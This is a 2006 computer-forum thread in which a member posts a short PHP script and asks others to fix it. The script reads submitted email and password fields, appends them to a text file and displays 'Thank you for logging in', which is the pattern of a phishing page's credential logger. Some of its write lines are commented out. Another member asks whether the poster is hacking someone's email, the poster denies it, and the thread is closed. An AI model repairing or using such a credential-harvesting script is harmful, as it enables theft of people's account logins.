Computer Forums

Member Login

Remember Me? Sign Up! | Forgot Password
 
Slogan
 
Closed Thread
Old 12-21-2006, 10:12 PM   #1 (permalink)
massacreinfallx's Avatar
 
Monster Techie

Join Date: Jun 2006

Posts: 1,567

massacreinfallx

Send a message via AIM to massacreinfallx
Default Script help

$fName = "sv.txt"; //rename to anything
$email = $_POST['email'];
$password = $_POST['password'];
$fHandle = fopen($fName, a); //Create sv.txt
echo "Thank you for logging in";
/*$wRite = fputs($fHandle, $email)*/; //writes email
$wRite1 = fputs($fHandle, " : "); //yes, I know what string concatenation is! I just coded this in a rush.
//$wRite2 = fputs($fHandle, $password); //writes password
$wRite3 = fputs($fHandle, "\r"); //return
$FCl = fclose($fHandle); //Close the file

Could sombody fix that script for me?
massacreinfallx is offline  
Old 12-21-2006, 10:28 PM   #2 (permalink)
 
Ultra Techie

Join Date: Dec 2005

Posts: 837

2fast4u is on a distinguished road

Send a message via AIM to 2fast4u
Default

r u trying to hack someones email?
__________________
2fast4u is offline  
Old 12-21-2006, 10:32 PM   #3 (permalink)
massacreinfallx's Avatar
 
Monster Techie

Join Date: Jun 2006

Posts: 1,567

massacreinfallx

Send a message via AIM to massacreinfallx
Default

no.
massacreinfallx is offline  
 
Closed Thread

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On